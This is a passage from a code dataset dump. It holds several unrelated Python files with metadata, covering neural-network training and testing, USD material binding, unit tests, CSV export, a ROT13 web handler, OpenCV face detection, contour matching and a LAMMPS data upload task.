Variable(order_data), Variable(order_data_reverse), \\\n Variable(target), Variable(feature)\n\n output_T = model_T.forward_T(order_data, order_data_reverse) \n output_E, _ = model_E.forward_E(data, data_reverse, feature)\n output_G, _ , _= model_G.forward_G(data, data_reverse, output_T.detach(), output_E.detach())\n \n test_loss += F.nll_loss(output_G, target, size_average=False).item()\n\n pred_T = output_T.data.max(1, keepdim=True)[1]\n eq_T = pred_T.eq(target.data.view_as(pred_T)).cpu().sum()\n correct_T += eq_T\n\n pred_E = output_E.data.max(1, keepdim=True)[1]\n eq_E = pred_E.eq(target.data.view_as(pred_E)).cpu().sum()\n correct_E += eq_E\n \n pred_G = output_G.data.max(1, keepdim=True)[1]\n eq_G = pred_G.eq(target.data.view_as(pred_G)).cpu().sum()\n correct_G += eq_G\n\n subject_dic_T[subject.cpu().numpy()[0]] += eq_T.numpy()\n subject_dic_E[subject.cpu().numpy()[0]] += eq_E.numpy()\n subject_dic_G[subject.cpu().numpy()[0]] += eq_G.numpy()\n \n \n count_dic[subject.cpu().numpy()[0]] += 1.0\n real_dic[subject.cpu().numpy()[0]] = target.cpu().numpy()[0]\n\n test_loss /= len(test_dataset)\n print('\\nTest set: Average loss: {:.4f}, ACC_T: {:.4f} ACC_E: {:.4f} ACC_G: {:.4f}\\n'.format(\n test_loss, float(correct_T) / len(test_dataset), float(correct_E) / len(test_dataset), float(correct_G) / len(test_dataset)))\n\n print (\"-------------------------model_T--------------------------------\")\n cal_performance(subject_dic_T, count_dic, real_dic)\n print (\"-------------------------model_E--------------------------------\")\n cal_performance(subject_dic_E, count_dic, real_dic)\n print (\"-------------------------model_G--------------------------------\")\n cal_performance(subject_dic_G, count_dic, real_dic)\n \n return test_loss\n\n\nif __name__ == \"__main__\":\n for epoch in range(1, epochs+1):\n train(epoch)\n test()\n save_network(model_T, \"T\", epoch)\n save_network(model_E, \"E\", epoch)\n save_network(model_G, \"G\", epoch)\n", "sub_path": "mitbin_test.py", "file_name": "mitbin_test.py", "file_ext": "py", "file_size_in_byte": 13312, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 70, "usage_type": "call"}, {"api_name": "dataset.MitbinDataset", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 91, "usage_type": "attribute"}, {"api_name": "dataset.MitbinDataset", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 98, "usage_type": "attribute"}, {"api_name": "model.TCN", "line_number": 108, "usage_type": "call"}, {"api_name": "model.TCN", "line_number": 109, "usage_type": "call"}, {"api_name": "model.TCN", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 117, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 175, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 214, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 215, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 216, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_curve", "line_number": 217, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 218, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 219, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 220, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 221, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 233, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 234, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 235, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 237, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 263, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 264, "usage_type": "call"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 270, "usage_type": "name"}]} {"seq_id": "477692635", "text": "'''Attempt to set a material on the kitchen fridge'''\n\nimport os\nimport argparse\n\nfrom pxr import Gf, Kind, Sdf, Usd, UsdGeom, UsdShade\n\n\nEXPORT_NAME = 'KitchenFridgeMaterial.usda'\nTEXTURE_FILE = os.path.abspath('../textures/UV_Grid_Sm.jpg')\nFRIDGE_PATH = '/Kitchen_set/Props_grp/North_grp/FridgeArea_grp/Refridgerator_1/Geom/Body'\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='Add a texture to a Kitchen scene table save it')\n\n parser.add_argument('kitchen', help='Kitchen set file location')\n\n return parser\n\ndef make_material(stage, path):\n # Create material\n material = UsdShade.Material.Define(stage, path)\n mat_path = material.GetPath()\n stInput = material.CreateInput('frame:stPrimvarName', Sdf.ValueTypeNames.Token)\n stInput.Set('st')\n\n pbrShader = UsdShade.Shader.Define(stage, mat_path.AppendPath('PBRShader'))\n pbrShader.CreateIdAttr('UsdPreviewSurface')\n\n stReader = UsdShade.Shader.Define(stage, mat_path.AppendPath('stReader'))\n stReader.CreateIdAttr('UsdPrimvarReader_float2')\n stReader.CreateInput('varname',Sdf.ValueTypeNames.Token).ConnectToSource(stInput)\n\n diffuseTextureSampler = UsdShade.Shader.Define(stage, mat_path.AppendPath('diffuseTexture'))\n diffuseTextureSampler.CreateIdAttr('UsdUVTexture')\n diffuseTextureSampler.CreateInput('file', Sdf.ValueTypeNames.Asset).Set(TEXTURE_FILE)\n diffuseTextureSampler.CreateInput('st', Sdf.ValueTypeNames.Float2).ConnectToSource(stReader, 'result')\n diffuseTextureSampler.CreateOutput('rgb', Sdf.ValueTypeNames.Float3)\n pbrShader.CreateOutput('diffuseColor', Sdf.ValueTypeNames.Color3f).ConnectToSource(diffuseTextureSampler, 'rgb')\n\n material.CreateSurfaceOutput().ConnectToSource(pbrShader, 'surface')\n\n return material\n\ndef main():\n\n parser = get_parser()\n\n args = parser.parse_args()\n\n # Make the stage\n stage = Usd.Stage.Open(os.path.abspath(args.kitchen))\n\n # Create material\n material = make_material(stage, FRIDGE_PATH + '/grid_material')\n\n # Bind materials\n tileFloorPrim = stage.GetPrimAtPath(FRIDGE_PATH)\n treeIter = iter(Usd.PrimRange.AllPrims(tileFloorPrim))\n for prim in treeIter:\n gprim = UsdGeom.Gprim.Get(stage, prim.GetPath())\n UsdShade.MaterialBindingAPI(gprim).Bind(material)\n\n # Export Stage\n stage.Export(EXPORT_NAME)\n\n\nif __name__ == '__main__':\n main()\n\n", "sub_path": "material_tests/kitchen_material_test.py", "file_name": "kitchen_material_test.py", "file_ext": "py", "file_size_in_byte": 2379, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "pxr.UsdShade.Material.Define", "line_number": 22, "usage_type": "call"}, {"api_name": "pxr.UsdShade.Material", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pxr.UsdShade", "line_number": 22, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 24, "usage_type": "name"}, {"api_name": "pxr.UsdShade.Shader.Define", "line_number": 27, "usage_type": "call"}, {"api_name": "pxr.UsdShade.Shader", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pxr.UsdShade", "line_number": 27, "usage_type": "name"}, {"api_name": "pxr.UsdShade.Shader.Define", "line_number": 30, "usage_type": "call"}, {"api_name": "pxr.UsdShade.Shader", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pxr.UsdShade", "line_number": 30, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 32, "usage_type": "name"}, {"api_name": "pxr.UsdShade.Shader.Define", "line_number": 34, "usage_type": "call"}, {"api_name": "pxr.UsdShade.Shader", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pxr.UsdShade", "line_number": 34, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 36, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 37, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 38, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 39, "usage_type": "name"}, {"api_name": "pxr.Usd.Stage.Open", "line_number": 52, "usage_type": "call"}, {"api_name": "pxr.Usd.Stage", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pxr.Usd", "line_number": 52, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pxr.Usd.PrimRange.AllPrims", "line_number": 59, "usage_type": "call"}, {"api_name": "pxr.Usd.PrimRange", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pxr.Usd", "line_number": 59, "usage_type": "name"}, {"api_name": "pxr.UsdGeom.Gprim.Get", "line_number": 61, "usage_type": "call"}, {"api_name": "pxr.UsdGeom.Gprim", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pxr.UsdGeom", "line_number": 61, "usage_type": "name"}, {"api_name": "pxr.UsdShade.MaterialBindingAPI", "line_number": 62, "usage_type": "call"}, {"api_name": "pxr.UsdShade", "line_number": 62, "usage_type": "name"}]} {"seq_id": "648607667", "text": "# coding: utf8\nimport pytest\nfrom app.views import answers as an\nfrom app.views import templates as t\nfrom tests.helpers.fake_i18n import I18N\nfrom tests.helpers.fake_base_message import FakeMessage\nfrom app.views.helpers import Types\n\n\n@pytest.mark.unit\n@pytest.mark.views\n@pytest.mark.answers\ndef test__inside_get(state, monkeypatch):\n monkeypatch.setattr(an, \"I18N\", I18N)\n monkeypatch.setattr(t, \"SystemException\", FakeMessage)\n an.SystemException._get(state)\n\n\n@pytest.mark.unit\n@pytest.mark.views\n@pytest.mark.answers\ndef test__get(state, data, monkeypatch):\n monkeypatch.setattr(an, \"I18N\", I18N)\n monkeypatch.setattr(t, \"SystemException\", FakeMessage)\n answer = an.SystemException.get(state)\n\n assert answer[\"chat_id\"] == data[\"id\"]\n assert answer[\"message_type\"] == Types.TEXT_MESSAGE\n assert isinstance(answer[\"text\"], str)\n", "sub_path": "tests/units/answers/test__system_exception.py", "file_name": "test__system_exception.py", "file_ext": "py", "file_size_in_byte": 861, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "app.views.answers", "line_number": 14, "usage_type": "argument"}, {"api_name": "tests.helpers.fake_i18n.I18N", "line_number": 14, "usage_type": "argument"}, {"api_name": "app.views.templates", "line_number": 15, "usage_type": "argument"}, {"api_name": "tests.helpers.fake_base_message.FakeMessage", "line_number": 15, "usage_type": "argument"}, {"api_name": "app.views.answers.SystemException._get", "line_number": 16, "usage_type": "call"}, {"api_name": "app.views.answers.SystemException", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.views.answers", "line_number": 16, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 12, "usage_type": "attribute"}, {"api_name": "app.views.answers", "line_number": 23, "usage_type": "argument"}, {"api_name": "tests.helpers.fake_i18n.I18N", "line_number": 23, "usage_type": "argument"}, {"api_name": "app.views.templates", "line_number": 24, "usage_type": "argument"}, {"api_name": "tests.helpers.fake_base_message.FakeMessage", "line_number": 24, "usage_type": "argument"}, {"api_name": "app.views.answers.SystemException.get", "line_number": 25, "usage_type": "call"}, {"api_name": "app.views.answers.SystemException", "line_number": 25, "usage_type": "attribute"}, {"api_name": "app.views.answers", "line_number": 25, "usage_type": "name"}, {"api_name": "app.views.helpers.Types.TEXT_MESSAGE", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app.views.helpers.Types", "line_number": 28, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 21, "usage_type": "attribute"}]} {"seq_id": "336038700", "text": "import csv\nimport json\nfrom datetime import datetime\n\ndef ToCSV_separately(Province_list):\n path_peifix = 'D:\\MyGit\\Real-time-dynamic-query-of-pneumonia\\Data Record Separately\\\\'\n for province in Province_list:\n file_path = path_peifix+province.provinceShortName+'.csv'\n csv_file = open(file_path, 'a+', newline='')\n title = ['sort','确诊','疑似','治愈','死亡','修改时间']\n writer = csv.writer(csv_file)\n writer.writerow(title)\n \n modify_time = datetime.fromtimestamp(province.modifyTime/1000)\n time_str = datetime.strftime(modify_time,'%Y-%m-%d %H:%M:%S')\n writer.writerow([province.sort,province.num_confirmed,province.num_suspected,province.num_cured,province.num_dead,time_str])\n csv_file.close()\n\ndef DicToCSV(dic_data,file_name):\n path = 'D:\\MyGit\\Real-time-dynamic-query-of-pneumonia\\Data Record csv\\\\' + file_name\n csv_file = open(path, 'w+', newline='')\n keys = []\n writer = csv.writer(csv_file)\n for dic in dic_data:\n keys = dic.keys()\n # 写入列名\n writer.writerow(keys)\n break\n\n for dic in dic_data:\n for key in keys:\n if key not in dic:\n dic[key] = ''\n writer.writerow(dic.values())\n csv_file.close()", "sub_path": "functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 1293, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "csv.writer", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 23, "usage_type": "call"}]} {"seq_id": "244437895", "text": "# Copyright 2016 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport webapp2\nimport cgi\n\nform=\"\"\"\n\n\n \n Unit 2 ROT13\n \n\n \n
    \n

    Enter some text to ROT13:

    \n
    \n \n
    \n \n
    \n \n\n\n\"\"\"\n\n#handler for /rot13\nclass ROT13(webapp2.RequestHandler):\n def write_form(self, user_input=\"\"):\n encoded_output = user_input.encode('rot13')\n self.response.out.write(form % {'encoded_output': cgi.escape(encoded_output, quote=True) })\n\n def get(self):\n self.write_form()\n\n def post(self):\n user_input = self.request.get(\"text\")\n self.write_form(user_input)\n", "sub_path": "unit2/rot13.py", "file_name": "rot13.py", "file_ext": "py", "file_size_in_byte": 1342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "webapp2.RequestHandler", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cgi.escape", "line_number": 42, "usage_type": "call"}]} {"seq_id": "261261821", "text": "import cv2\n#openCV module\n\n\nface_cascade = cv2.CascadeClassifier('for_face.xml')\ncap = cv2.VideoCapture('v.mp4')\n# use 0 (inbuilt webcam) -1 (for external webcam) instead of v.mp4 to get results from webcam\n\n\nwhile True:\n _, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \n faces = face_cascade.detectMultiScale(gray, 1.9, 6)\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 1)\n\n\n cv2.imshow('img', img)\n k = cv2.waitKey(2) & 0xff\n if k==27:\n break\n \ncap.release()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 559, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 20, "usage_type": "call"}]} {"seq_id": "505880080", "text": "#!/usr/bin/env python\n\nimport cv2\nimport numpy as np\n\n\n# Template Matching Class\nclass Template:\n\n\t# Set up the template contour for later use\n\tdef __init__(self):\n\t\tself.__template_image__ = cv2.imread(\"template.png\")\n\t\tself.__template_image__ = cv2.cvtColor(self.__template_image__, cv2.COLOR_BGR2HSV)\n\t\tself.__template_image__ = cv2.inRange(self.__template_image__, np.array([0, 0, 2]), np.array([255, 255, 255]))\n\t\t_, contours, h = cv2.findContours(self.__template_image__, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\t\tareas = [cv2.contourArea(c) for c in contours]\n\t\tmx_indx = np.argmax(areas)\n\t\tself.__template_contour__ = contours[mx_indx]\n\n\t# Compare the list of contours to the template and sort by the closest matching contours.\n\t# Returns a 2d array, first column contains a number representing the match, smaller the number,\n\t# the closer the contour is to the template, second column represents the array index in the\n\t# originally passed list\n\tdef list_of_matched(self, contours):\n\t\tlist_of_matches = []\n\t\tindex = 0\n\t\tfor c in contours:\n\t\t\tlist_of_matches.append([cv2.matchShapes(self.__template_contour__, c, 1, 0.0), index])\n\t\t\tindex += 1\n\t\tlist_of_matches = sorted(list_of_matches, key=lambda x: x[0])\n\t\treturn list_of_matches\n\n\t# Get the index of the best matched contour in passed list of contours\n\tdef best_match(self, contours):\n\t\treturn self.list_of_matched(contours)[0][1]\n\n\t# For debugging, Just to see what the template looks like\n\tdef get_image_to_show(self):\n\t\treturn self.__template_image__\n\n", "sub_path": "Template.py", "file_name": "Template.py", "file_ext": "py", "file_size_in_byte": 1517, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "cv2.imread", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.matchShapes", "line_number": 28, "usage_type": "call"}]} {"seq_id": "536222250", "text": "from invoke import task\nfrom os.path import exists, join\nimport requests\n\nfrom tasks.lammps.env import (\n LAMMPS_DIR,\n LAMMPS_FAASM_DATA_PREFIX,\n get_faasm_benchmark,\n)\nfrom tasks.util.faasm import get_faasm_upload_host_port\n\n\n@task(default=True, iterable=[\"bench\"])\ndef upload(ctx, bench):\n \"\"\"\n Upload LAMMPS benchmark data to Faasm\n \"\"\"\n for b in bench:\n _bench = get_faasm_benchmark(b)\n\n host, port = get_faasm_upload_host_port()\n url = \"http://{}:{}/file\".format(host, port)\n\n # Upload all data corresponding to the benchmark\n for data in _bench[\"data\"]:\n file_name = data.split(\"/\")[-1]\n host_path = join(LAMMPS_DIR, data + \".faasm\")\n faasm_path = join(LAMMPS_FAASM_DATA_PREFIX, file_name)\n\n if not exists(host_path):\n print(\"Did not find data at {}\".format(host_path))\n raise RuntimeError(\"Did not find LAMMPS data!\")\n\n print(\n \"Uploading LAMMPS data ({}) to {} ({})\".format(\n host_path, url, faasm_path\n )\n )\n response = requests.put(\n url,\n data=open(host_path, \"rb\"),\n headers={\"FilePath\": faasm_path},\n )\n\n print(\n \"Response {}: {}\".format(response.status_code, response.text)\n )\n\n if response.status_code != 200:\n raise RuntimeError(\"Error uploading LAMMPS data!\")\n", "sub_path": "tasks/lammps/data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 1508, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tasks.lammps.env.get_faasm_benchmark", "line_number": 19, "usage_type": "call"}, {"api_name": "tasks.util.faasm.get_faasm_upload_host_port", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "tasks.lammps.env.LAMMPS_DIR", "line_number": 27, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "tasks.lammps.env.LAMMPS_FAASM_DATA_PREFIX", "line_number": 28, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 30, "usage_type": "call"}, {"api_name": "requests.put", "line_number": 39, "usage_type": "call"}, {"api_name": "invoke.task", "line_number": 13, "usage_type": "call"}]} {"seq_id": "73654908", "text": "# /bin/env python3\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.preprocessing import Imputer, MinMaxScaler\n\nclass MLP():\n def __init__(\n self,\n mse_target=1e-4,\n max_epochs=1000,\n hidden_layer_sizes=None,\n output_fn=tf.identity,\n verbose=False,\n learning_rate=0.001,\n ):\n print(\"init\")\n self.net = None\n self._initialized = False\n\n self.mse_target = mse_target\n self.max_epochs = max_epochs\n self._verbose = verbose\n if hidden_layer_sizes is not None:\n if type(hidden_layer_sizes) is not tuple:\n raise Exception(\"invalid hidden layer architecure\")\n if len(hidden_layer_sizes) <= 0:\n raise Exception(\"invalid hidden layer architecure, length is zero\")\n self.hidden_layer_sizes = hidden_layer_sizes\n self.output_fn = output_fn\n self.learning_rate = learning_rate\n\n def _initializers(self, x_shape, y_shape):\n print(\"initializers\")\n if hasattr(self, \"_initialized\") and self._initialized:\n return\n\n self._x_shape = x_shape\n self._y_shape = y_shape\n\n # Initializers\n sigma = 1\n weight_initializer = tf.variance_scaling_initializer(\n mode=\"fan_avg\",\n distribution=\"uniform\",\n scale=sigma\n )\n bias_initializer = tf.zeros_initializer()\n\n # Data placeholders\n self._X = tf.placeholder(dtype=tf.float32, shape=[None, x_shape[1]])\n self._Y = tf.placeholder(dtype=tf.float32, shape=[None, y_shape[1]])\n\n n_target = y_shape[1]\n\n neurons = [x_shape[1]]\n hiddens = [self._X]\n\n for layer in self.hidden_layer_sizes:\n n_neurons = 0\n activation = None\n if type(layer) is int:\n n_neurons = layer\n activation = tf.nn.relu\n elif type(layer) is tuple:\n if len(layer) != 2:\n raise Exception(\"invalid layer tuple size\")\n n_neurons = layer[0]\n activation = layer[1]\n else:\n raise Exception(\"invalid type of layer\")\n # Layer: Variables for hidden weights and biases\n W_hidden = tf.Variable(\n weight_initializer([neurons[-1], n_neurons])\n )\n neurons.append(n_neurons)\n bias_hidden = tf.Variable(bias_initializer([n_neurons]))\n # Hidden layer\n hiddens.append(\n activation(\n tf.add(tf.matmul(hiddens[-1], W_hidden), bias_hidden)\n )\n )\n\n # Output layer: Variables for output weights and biases\n W_out = tf.Variable(weight_initializer([neurons[-1], n_target]))\n bias_out = tf.Variable(bias_initializer([n_target]))\n\n # Output layer\n self._out = self.output_fn(\n tf.add(tf.matmul(hiddens[-1], W_out), bias_out))\n\n # Cost function\n self._mse = tf.reduce_mean(tf.squared_difference(self._out, self._Y))\n\n # Optimizer\n self._opt = tf.train.AdamOptimizer(\n learning_rate=self.learning_rate,\n ).minimize(self._mse)\n\n # Saver\n self._saver = tf.train.Saver()\n\n # Session\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n\n # Init\n self.net.run(tf.global_variables_initializer())\n\n self._initialized = True\n\n def fit(self, X, y):\n if type(X) is not np.ndarray:\n raise TypeError()\n if type(y) is not np.ndarray:\n raise TypeError()\n if len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n if len(y.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n self._initializers(X.shape, y.shape)\n\n # Build train and test data set\n train_start = 0\n train_end = int(np.floor(0.8 * X.shape[0]))\n test_start = train_end + 1\n test_end = X.shape[0]\n X_data_train = X[np.arange(train_start, train_end), :]\n X_test = X[np.arange(test_start, test_end), :]\n y_data_train = y[np.arange(train_start, train_end), :]\n y_test = y[np.arange(test_start, test_end), :]\n\n # Fit neural net\n batch_size = 256\n mse_train = []\n mse_test = []\n\n mse_actual = np.finfo(np.float32).max\n epochs = 0\n\n while mse_actual > self.mse_target and epochs < self.max_epochs:\n # Shuffle training data\n shuffle_indices = np.random.permutation(\n np.arange(X_data_train.shape[0]))\n X_train = X_data_train[shuffle_indices]\n y_train = y_data_train[shuffle_indices]\n\n if X.shape[0] <= batch_size:\n self.net.run(\n self._opt,\n feed_dict={self._X: X_train, self._Y: y_train})\n mse_train.append(\n self.net.run(\n self._mse,\n feed_dict={self._X: X_train, self._Y: y_train}))\n mse_test.append(\n self.net.run(\n self._mse,\n feed_dict={self._X: X_test, self._Y: y_test}))\n mse_actual = mse_train[-1]\n\n if np.mod(epochs, 50) == 0 and self._verbose:\n print(\"Epoch:\", epochs)\n print('MSE Train:', mse_train[-1])\n print('MSE Test:', mse_test[-1])\n else:\n # Minibatch training\n for i in range(0, X.shape[0] // batch_size):\n start = i * batch_size\n batch_x = X_train[start:start + batch_size]\n batch_y = y_train[start:start + batch_size]\n # Run optimizer with batch\n self.net.run(\n self._opt,\n feed_dict={self._X: batch_x, self._Y: batch_y})\n mse_train.append(\n self.net.run(\n self._mse,\n feed_dict={self._X: X_train, self._Y: y_train}))\n mse_test.append(\n self.net.run(\n self._mse,\n eed_dict={self._X: X_test, self._Y: y_test}))\n mse_actual = mse_train[-1]\n\n if np.mod(epochs, 50) == 0 and self._verbose:\n print(\"Epoch:\", epochs)\n print('MSE Train:', mse_train[-1])\n print('MSE Test:', mse_test[-1])\n\n epochs += 1\n self.mse_train = mse_train\n self.mse_test = mse_test\n return self\n\n def score(self, X, y_true):\n \"\"\" R^2 coefficient\n The best possible score is 1.0 and it can be negative\n (because the model can be arbitrarily worse). A constant\n model that always predicts the expected value of y,\n disregarding the input features, would get a R^2 score of 0.0.\n (from sklearn documentation)\n \"\"\"\n if not self._initialized:\n raise Exception(\"Not initialized. Run fit first.\")\n if type(X) is not np.ndarray:\n raise TypeError()\n if type(y_true) is not np.ndarray:\n raise TypeError()\n if 